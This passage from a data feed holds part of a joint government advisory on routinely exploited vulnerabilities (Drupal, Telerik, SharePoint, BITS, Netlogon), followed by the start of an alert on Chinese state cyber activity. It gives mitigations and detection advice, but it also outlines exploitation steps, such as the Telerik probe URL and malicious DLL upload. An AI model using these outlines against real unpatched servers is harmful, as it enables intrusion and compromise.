4.3](<https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html>) \n \n_Table 11: CVE 2018-7600 Vulnerability Details_\n\nDrupal Core Multiple Remote Code Execution (CVE 2018-7600) \n--- \n \n_**Vulnerability Description**_\n\nDrupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allow remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nAn RCE vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. Failed exploit attempts may result in a denial-of-service condition. A remote user can send specially crafted data to trigger a flaw in the processing of renderable arrays in the Form Application Programming Interface, or API, and cause the target system to render the user-supplied data and execute arbitrary code on the target system.\n\n_Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining._\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.drupal.org/sa-core-2018-002>) \n \n_**Recommended Mitigations**_\n\n * Upgrade to the most recent version of Drupal 7 or 8 core. If running 7.x, upgrade to Drupal 7.58. If running 8.5.x, upgrade to Drupal 8.5.1. \n \n_**Detection Methods**_\n\n * Dan Sharvit developed a tool to check for the CVE-2018-7600 vulnerability on several URLs: [https://github.com/sl4cky/CVE-2018-7600-Masschecker/blob/master/Drupalgeddon-mass.py.](<https://github.com/sl4cky/CVE-2018-7600-Masschecker/blob/master/Drupalgeddon-mass.py>) \n \n_**Vulnerable Technologies and Versions**_\n\n * Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are affected. \n \n_**References**_\n\n * [Drupal Security Advisory: Drupal Core - Highly Critical - Remote Code Execution - SA-CORE-2018-002](<https://www.drupal.org/sa-core-2018-002>)\n * [NIST NVD Vulnerability Detail: CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>)\n * [Drupal Groups: FAQ about SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>) \n \n_Table 12: CVE 2019-18935 Vulnerability Details_\n\nTelerik UI for ASP.NET AJAX Insecure Deserialization (CVE 2019-18935) \n--- \n \n_**Vulnerability Description**_\n\nTelerik User Interface (UI) for ASP.NET does not properly filter serialized input for malicious content. Versions prior to R1 2020 (2020.1.114) are susceptible to remote code execution attacks on affected web servers due to a deserialization vulnerability.\n\n| \n\n**_CVS 3.0_**\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThe Telerik UI does not properly sanitize serialized data inputs from the user. This vulnerability leads to the application being vulnerable to RCE attacks that may lead to a full system compromise. A vulnerable `HTTP POST` parameter `rauPostData` makes use of a vulnerable function/object `AsyncUploadHandler`. The object/function uses the `JavaScriptSerializer.Deserialize()` method, which not not properly sanitize the serialized data during the deserialization process. This issue is attacked by:\n\n 1. Determining the vulnerable function is available/registered: ` http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau`,\n 2. Determining if the version running is vulnerable by querying the UI, and\n 3. Creating an object (e.g., malicious mixed-mode DLL with native OS commands or Reverse Shell) and uploading the object via rauPostData parameter along with the proper encryption key.\n\n_There were two malware campaigns associated with this vulnerability:_\n\n * _Netwalker Ransomware and_\n * _Blue Mockbird Monero Cryptocurrency-mining._\n| \n\n_**Fix**_\n\n[Patch Available](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>) \n \n_**Recommended Mitigations**_\n\n * Update to the most recent version of Telerik UI for ASP.NET AJAX (at least 2020.1.114 or later). \n \n_**Detection Methods**_\n\n * ACSC has an example PowerShell script that can be used to identify vulnerable Telerik UI DLLs on Windows web server hosts.\n * Vulnerable hosts should be reviewed for evidence of exploitation. Indicators of exploitation can be found in IIS HTTP request logs and within the Application Windows event log. Details of the above PowerShell script and exploitation detection recommendations are available in [ACSC Advisory 2020-004](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>).\n * Exploitation of this and previous Telerik UI vulnerabilities commonly resulted in the installation of web shell malware. NSA provides guidance on [detecting and preventing web shell malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>). \n \n**_Vulnerable Technologies and Versions_**\n\nTelerik UI for ASP.NET AJAX versions prior to R1 2020 (2020.1.114) are affected. \n \n**_References_**\n\n * [Telerik UI for ASP.NET AJAX security advisory \u2013 Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>)\n * [NIST NVD Vulnerability Detail: CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)\n * [ACSC Advisory 2020-004: Remote Code Execution Vulnerability Being Actively Exploited in Vulnerable Versions of Telerik UI by Sophisticated Actors](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>)\n * [Bishop Fox \u2013 CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI](<https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui>)\n * [FBI FLASH: Indicators Associated with Netwalker Ransomware](<https://www.ic3.gov/Media/News/2020/200929-2.pdf>) \n \n_Table 13: CVE-2019-0604 Vulnerability Details_\n\nMicrosoft SharePoint Remote Code Execution (CVE-2019-0604) \n--- \n \n_**Vulnerability Description**_\n\nA vulnerability in an XML deserialization component within Microsoft SharePoint allowed remote attackers to execute arbitrary code on vulnerable Microsoft SharePoint servers.\n\n| \n\n**_CVSS 3.0_**\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThis vulnerability was typically exploited to install webshell malware to vulnerable hosts. A webshell could be placed in any location served by the associated Internet Information Services (IIS) web server and did not require authentication. These web shells would commonly be installed in the Layouts folder within the Microsoft SharePoint installation directory, for example:\n\n`C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\<version_number>\\Template\\Layouts`\n\nThe `xmlSerializer.Deserialize()` method does not adequately sanitize user input that is received from the PickerEnitity/ValidateEnity (`picker.aspx`) functions in the serialized XML payloads. Once the serialized XML payload is deserialized, the XML code is evaulated for relevant XML commands and stings. A user can attack .Net based XML parsers with XMLNS payloads using the &lt;`system:string`&gt; tag and embedding malicious operating system commands. \n\n_The exploit was used in malware phishing and the WickrMe/Hello Ransomware campaigns._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>) \n \n_**Recommended Mitigations**_\n\n * Upgrade on-premise installations of Microsoft Sharepoint to the latest available version (Microsoft SharePoint 2019) and patch level.\n * On-premise Microsoft SharePoint installations with a requirement to be accessed by internet-based remote staff should be moved behind an appropriate authentication mechanism such as a VPN, if possible. \n \n_**Detection Methods**_\n\n * The patch level of on-premise Microsoft SharePoint installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft SharePoint security advisory.\n * Vulnerable SharePoint servers should be reviewed for evidence of attempted exploitation. [ACSC Advisory 2019-125](<https://www.cyber.gov.au/acsc/view-all-content/advisories/acsc-advisory-2019-125-targeting-microsoft-sharepoint-cve-2019-0604>) contains advice on reviewing IIS HTTP request logs for evidence of potential exploitation.\n * NSA provides guidance on [detecting and preventing web shell malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>). \n \n_**Vulnerable Technologies and Versions**_\n\nAt the time of the vulnerability release, the following Microsoft SharePoint versions were affected: Microsoft Sharepoint 2019, Microsoft SharePoint 2016, Microsoft SharePoint 2013 SP1, and Microsoft SharePoint 2010 SP2. \n \n_**References**_\n\n * [Microsoft \u2013 SharePoint Remote Code Execution Vulnerability Security Advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>)\n * [NIST NVD Vulnerability Detail: CVE-2019-0604](<https://nvd.nist.gov/vuln/detail/cve-2019-0604>)\n * [ACSC Advisory 2019-125: Targeting of Microsoft SharePoint CVE-2019-0604](<https://www.cyber.gov.au/acsc/view-all-content/advisories/acsc-advisory-2019-125-targeting-microsoft-sharepoint-cve-2019-0604>)\n * [NSCS Alert: Microsoft SharePoint Remote Code Vulnerability](<https://www.ncsc.gov.uk/news/alert-microsoft-sharepoint-remote-code-vulnerability>) \n \n_Table 14: CVE-2020-0787 Vulnerability Details_\n\nWindows Background Intelligent Transfer Service Elevation of Privilege (CVE-2020-0787) \n--- \n \n_**Vulnerability Description**_\n\nThe Windows Background Intelligent Transfer Service (BITS) is vulnerable to a privilege elevation vulnerability if it improperly handles symbolic links. An actor can exploit this vulnerability to execute arbitrary code with system-level privileges.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nTo exploit this vulnerability, an actor would first need to have the ability to execute arbitrary code on a vulnerable Windows host.\n\nActors exploiting this vulnerability commonly used the proof of concept code released by the security researcher who discovered the vulnerability. If an actor left the proof of concept exploit\u2019s working directories unchanged, then the presence of the following folders could be used as an indicator of exploitation:\n\n`C:\\Users\\<username>\\AppData\\Local\\Temp\\workspace \nC:\\Users\\<username>\\AppData\\Local\\Temp\\workspace\\mountpoint \nC:\\Users\\<username>\\AppData\\Local\\Temp\\workspace\\bait`\n\n_The exploit was used in Maze and Egregor ransomware campaigns._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787>) \n \n_**Recommended Mitigations**_\n\n * Apply the security updates as recommended in the Microsoft Netlogon security advisory. \n \n_**Detection Methods**_\n\n * The patch level of all Microsoft Windows installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft BITS security advisory. \n \n_**Vulnerable Technologies and Versions**_\n\nWindows 7 for 32-bit and x64-based Systems Service Pack 1, 8.1 for 32-bit and x64-based systems, RT 8.1, 10 for 32-bit and x64-based Systems, 10 1607 for 32-bit and x64-based Systems, 10 1709 for 32-bit and x64-based and ARM64-based Systems, 10 1803 for 32-bit and ARM64-based and x64-based Systems, 10 1809 for 32-bit and ARM64-based and x64-based Systems, 10 1903 for 32-bit and ARM64-based and x64-based Systems, 10 1909 for 32-bit, and ARM64-based and x64-based Systems are vulnerable.\n\nWindows Server 2008 R2 for x64-based Systems Service Pack 1, 2008 R2 for x64-based Systems Service Pack 1 (Server Core Installation), 2008 for 32-bit Systems Service Pack 2, 2008 for 32-bit Systems Service Pack 2 (Server Core Installation), 2012, 2012 (Server Core Installation), 2012 R2, 2012 R2 (Server Core Installation), 2016, 2016 (Server Core Installation), 2019, 2019 (Server Core Installation), 1803 (Server Core Installation), 1903 (Server Core Installation), and 1909 (Server Core Installation) are also vulnerable. \n \n_**References**_\n\n * [Microsoft \u2013 Windows Background Intelligent Transfer Service Elevation of Privilege Security Advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787>)\n * [NIST NVD Vulnerability Detail: CVE-2020-0787](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>)\n * [Security Researcher \u2013 Proof of Concept Exploit Code](<https://itm4n.github.io/cve-2020-0787-windows-bits-eop/>) \n \n_Table 15: CVE-2020-1472 Vulnerability Details_\n\nMicrosoft Netlogon Elevation of Privilege (CVE-2020-1472) \n--- \n \n_**Vulnerability Description**_\n\nThe Microsoft Windows Netlogon Remote Protocol (MS-NRPC) reuses a known, static, zero-value initialization vector (VI) in AES-CFB8 mode, which could allow an unauthenticated attacker to impersonate a domain-joined computer including a domain controller, and potentially obtain domain administrator privileges.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nTo exploit this vulnerability, an actor would first need to have an existing presence on an internal network with network connectivity to a vulnerable Domain Controller, assuming that Domain Controllers are not exposed to the internet.\n\nThe immediate effect of successful exploitation results in the ability to authentication to the vulnerable Domain Controller with Domain Administrator level credentials. In compromises exploiting this vulnerability, exploitation was typically followed immediately by dumping all hashes for Domain accounts.\n\nThreat actors were seen combining the MobileIron CVE-2020-15505 vulnerability for initial access, then using the Netlogon vulnerability to facilitate lateral movement and further compromise of target networks.\n\n_A nation-state APT group has been observed exploiting this vulnerability_.[[18](<https://www.cyber.nj.gov/alerts-advisories/apt10-adds-zerologon-exploitation-to-ttps>)]\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) \n \n_**Recommended Mitigations**_\n\n * Apply the security updates as recommended in the Microsoft Netlogon security advisory. \n \n_**Detection Methods**_\n\n * The patch level of Domain Controllers should be reviewed for the presence of relevant security updates as outlined in the Microsoft Netlogon security advisory.\n * Reviewing and monitoring Windows Event Logs can identify potential exploitation attempts. However, further investigation would still be required to eliminate legitimate activity. Further information on these event logs is available in the [ACSC 2020-016 Advisory](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>). \n \n_**Vulnerable Technologies and Versions**_\n\nAt the time of the vulnerability release, the following Microsoft Windows Server versions were vulnerable: all versions of Windows Server 2019; all versions of Windows Server 2016; Windows Server 2012 R2; Windows Server 2012; Windows Server 2008 R2 SP1; and Windows Server versions 1909/1903/1809. \n \n_**References**_\n\n * [Microsoft \u2013 Netlogon Elevation of Privilege Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n * [NIST NVD Vulnerability Detail: CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/cve-2020-1472>)\n * [ACSC 2020-016 Netlogon Advisory](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n * [CISA-FBI Joint Cybersecurity Advisory: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [ACSC Advisory 2020-016: \"Zerologon\" \u2013 Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n * [NCSC Alert: UK Organisations Should Patch Netlogon Vulnerability (Zerologon)](<https://www.ncsc.gov.uk/news/alert-organisations-should-patch-netlogon-vulnerability>) \n \nFor additional general best practices for mitigating cyber threats, see the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) and ACSC\u2019s [Essential Eight](<https://www.cyber.gov.au/acsc/view-all-content/essential-eight>) mitigation strategies.\n\n### Additional Resources\n\n#### Free Cybersecurity Services\n\nCISA offers several free cyber hygiene vulnerability scanning and web application services to help U.S. federal agencies, state and local governments, critical infrastructure, and private organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. For more information about [CISA\u2019s free services](<https://www.cisa.gov/cyber-hygiene-services>), or to sign up, email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>).\n\n#### Cyber Essentials\n\n[CISA\u2019s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>) is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.\n\n#### Cyber.gov.au \n\n[ACSC\u2019s website](<https://www.cyber.gov.au/>) provides advice and information about how to protect individuals and families, small- and medium-sized businesses, large organizations and infrastructure, and government organizations from cyber threats.\n\n#### ACSC Partnership Program\n\nThe ACSC Partnership Program enables Australian organizations and individuals to engage with ACSC and fellow partners, drawing on collective understanding, experience, skills, and capability to lift cyber resilience across the Australian economy.\n\nAustralian organizations, including government and those in the private sector as well individuals, are welcome to sign up at [Become an ACSC partner](<https://www.cyber.gov.au/partner-hub/become-a-partner>) to join.\n\n#### NCSC 10 Steps\n\nThe NCSC offers [10 Steps to Cyber Security](<https://urldefense.us/v3/__https:/www.ncsc.gov.uk/collection/10-steps__;!!BClRuOV5cvtbuNI!T8Z-cMwGes9PcbBL1utGkQdFFUBjxNk7elZg1ioCK-eU1tUQokVWKONDFlwSGb1kHLNs74-CWWI8Rbcz$>), providing detailed guidance on how medium and large organizations can manage their security.\n\nOn vulnerabilities specifically, the NCSC has [guidance to organizations on establishing an effective vulnerability management process](<https://urldefense.us/v3/__https:/www.ncsc.gov.uk/guidance/vulnerability-management__;!!BClRuOV5cvtbuNI!T8Z-cMwGes9PcbBL1utGkQdFFUBjxNk7elZg1ioCK-eU1tUQokVWKONDFlwSGb1kHLNs74-CWfrZnnW4$>), focusing on the management of widely available software and hardware.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at[ www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:Central@cisa.gov>).\n\n### References\n\n[[1] NSA-CISA-FBI Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)\n\n[[2] CISA-FBI-NSA-NCSC Advisory: Further TTPs Associated with SVR Cyber Actors](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>)\n\n[[3] NSA Cybersecurity Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)\n\n[[4] ACSC Advisory 2020-001-4: Remediation for Critical Vulnerability in Citrix Application Delivery Controller and Citrix Gateway](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2020-001-4-remediation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway>)\n\n[[5] NCSC Alert: Actors Exploiting Citrix Products Vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[6] Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n\n[[7] CISA-FBI Joint Cybersecurity Advisory: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[8] ACSC Alert: APT Exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)\n\n[[9] NCSC Alert: Alert: Critical Risk to Unpatched Fortinet VPN Devices](<https://www.ncsc.gov.uk/news/critical-risk-unpatched-fortinet-vpn-devices>)\n\n[[10] NSA Cybersecurity Advisory: Mitigating Recent VPN Vulnerabilities](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating Recent VPN Vulnerabilities - Copy.pdf>)\n\n[[11] NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n[[12] NCSC-Canada\u2019s Communications Security Establishment-NSA-CISA Advisory: APT29 Targets COVID-19 Vaccine Development (CSE)](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)\n\n[[13] ACSC Advisory: Summary of Tactics, Techniques and Procedures Used to Target Australian Networks](<https://www.cyber.gov.au/acsc/view-all-content/advisories/summary-tactics-techniques-and-procedures-used-target-australian-networks>)\n\n[[14] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n\n[[15] CISA Alert: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[16] CISA Emergency Directive (ED 20-03): Windows DNS Server Vulnerability](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)\n\n[[17] NCSC Alert: Alert: Multiple Actors are Attempting to Exploit MobileIron Vulnerability CVE 2020-15505](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>)\n\n[[18] NJCCIC Alert: APT10 Adds ZeroLogon Exploitation to TTPs](<https://www.cyber.nj.gov/alerts-advisories/apt10-adds-zerologon-exploitation-to-ttps>)\n\n### Revisions\n\nInitial Version: July 28, 2021|August 4, 2021: Fixed typo|August 20, 2021: Adjusted vendor name for CVE-2020-1472\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Top Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-20T12:00:00", "id": "AA21-209A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:34:12", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n_**Note**: on October 20, 2020, the National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) providing information on publicly known vulnerabilities exploited by Chinese state-sponsored cyber actors to target computer networks holding sensitive intellectual property, economic, political, and military information. This Alert has been updated to include information on vulnerabilities exploited by Chinese state-sponsored actors (see Table 4)._\n\nIn light of heightened tensions between the United States and China, the Cybersecurity and Infrastructure Security Agency (CISA) is providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs) and recommended mitigations to the cybersecurity community to assist in the protection of our Nation\u2019s critical infrastructure. In addition to the recommendations listed in the Mitigations section of this Alert, CISA recommends organizations take the following actions.\n\n 1. **Adopt a state of heightened awareness. **Minimize gaps in personnel availability, consistently consume relevant threat intelligence, and update emergency call trees.\n 2. **Increase organizational vigilance.** Ensure security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any known Chinese indicators of compromise (IOCs) and TTPs for immediate response.\n 3. **Confirm reporting processes.** Ensure personnel know how and when to report an incident. The well-being of an organization\u2019s workforce and cyber infrastructure depends on awareness of threat activity. Consider [reporting incidents](<https://us-cert.cisa.gov/report>) to CISA to help serve as part of CISA\u2019s early warning system (see the Contact Information section below).\n 4. **Exercise organizational incident response plans.** Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.\n\n### Technical Details\n\n#### China Cyber Threat Profile\n\nChina has a history of using national military and economic resources to leverage offensive cyber tactics in pursuing its national interests. The \u201cMade in China 2025\u201d 10-year plan outlines China\u2019s top-level policy priorities.[[1](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)],[[2](<https://fas.org/sgp/crs/row/IF10964.pdf>)] China may seek to target the following industries deemed critical to U.S. national and economic interests: new energy vehicles, next generation information technology (IT), biotechnology, new materials, aerospace, maritime engineering and high-tech ships, railway, robotics, power equipment, and agricultural machinery.[[3](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)] China has exercised its increasingly sophisticated capabilities to illegitimately obtain U.S. intellectual property (IP), suppress both social and political perspectives deemed dangerous to China, and harm regional and international opponents.\n\nThe U.S. Intelligence Community and various private sector threat intelligence organizations have identified the Chinese People\u2019s Liberation Army (PLA) and Ministry of State Security (MSS) as driving forces behind Chinese state-sponsored cyberattacks\u2013either through contractors in the Chinese private sector or by the PLA and MSS entities themselves. China continues to engage in espionage-related activities that include theft of sensitive information such as innovation capital, IP, and personally identifiable information (PII). China has demonstrated a willingness to push the boundaries of their activities to secure information critical to advancing their economic prowess and competitive advantage.\n\n#### Chinese Cyber Activity\n\nAccording to open-source reporting, offensive cyber operations attributed to the Chinese government targeted, and continue to target, a variety of industries and organizations in the United States, including healthcare, financial services, defense industrial base, energy, government facilities, chemical, critical manufacturing (including automotive and aerospace), communications, IT, international trade, education, videogaming, faith-based organizations, and law firms.\n\nAdditionally, numerous Department of Justice (DOJ) indictments over several years provide evidence to suggest Chinese threat actors continuously seek to illegally obtain and exfiltrate U.S. IP. Their targets also include western companies with operations inside China.\n\nPublic reporting that associates Chinese actors with a range of high-profile attacks and offensive cyber activity includes:\n\n * **February 2013 \u2013 Cyber Threat Intelligence Researchers Link Advanced Persistent Threat (APT) 1 to China:** a comprehensive report publicly exposed APT1 as part of China\u2019s military cyber operations and a multi-year effort that exfiltrated IP from roughly 141 companies spanning 20 major industries.[[4](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)] APT1 established access to the victims\u2019 networks and methodically exfiltrated IP across a large range of industries identified in China\u2019s 12th 5-Year Plan. A year later, the DOJ indicted Chinese cyber threat actors assigned to PLA Unit 61398 for the first time (also highlighted in the report).[[5](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)]\n * **April 2017 \u2013 Chinese APTs Targeting IP in 12 Countries:** CISA announced Chinese state-backed APTs carried out a multi-year campaign of cyber-enabled IP theft that targeted global technology service providers and their customers. The threat actors leveraged stolen administrative credentials (local and domain) and placed sophisticated malware on critical systems in an effort to steal the IP and sensitive data of companies located in at least 12 countries.[[6](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)]\n * **December 2018 \u2013 Chinese Cyber Threat Actors Indicted for Compromising Managed Service Providers (MSPs):** DOJ indicted two Chinese cyber threat actors believed to be associated with APT10, who targeted MSPs and their large customer base through phishing and spearphishing campaigns aimed at exfiltrating sensitive business data and, possibly, PII.[[7](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)] CISA also briefed stakeholders on Chinese APT groups who targeted MSPs and their customers to steal data and further operationalize commercial and economic espionage.[[8](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)]\n * **February 2020 \u2013 China\u2019s Military Indicted for 2017 Equifax Hack:** DOJ indicted members of China\u2019s PLA for stealing large amounts of PII and IP. The Chinese cyber threat actors exploited a vulnerability in the company\u2019s dispute resolution website to enter the network, conduct reconnaissance, upload malware, and steal credentials to extract the targeted data. The breach impacted roughly half of all American citizens and stole Equifax\u2019s trade secrets.[[9](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)]\n * **May 2020 \u2013 China Targets COVID-19 Research Organizations:** the Federal Bureau of Investigation (FBI) and CISA reported the targeting and compromise of U.S. organizations conducting COVID-19-related research by cyber actors affiliated with China.[[10](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)] Large-scale password spraying campaigns were a commonly observed tactic in illicitly obtaining IP related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related 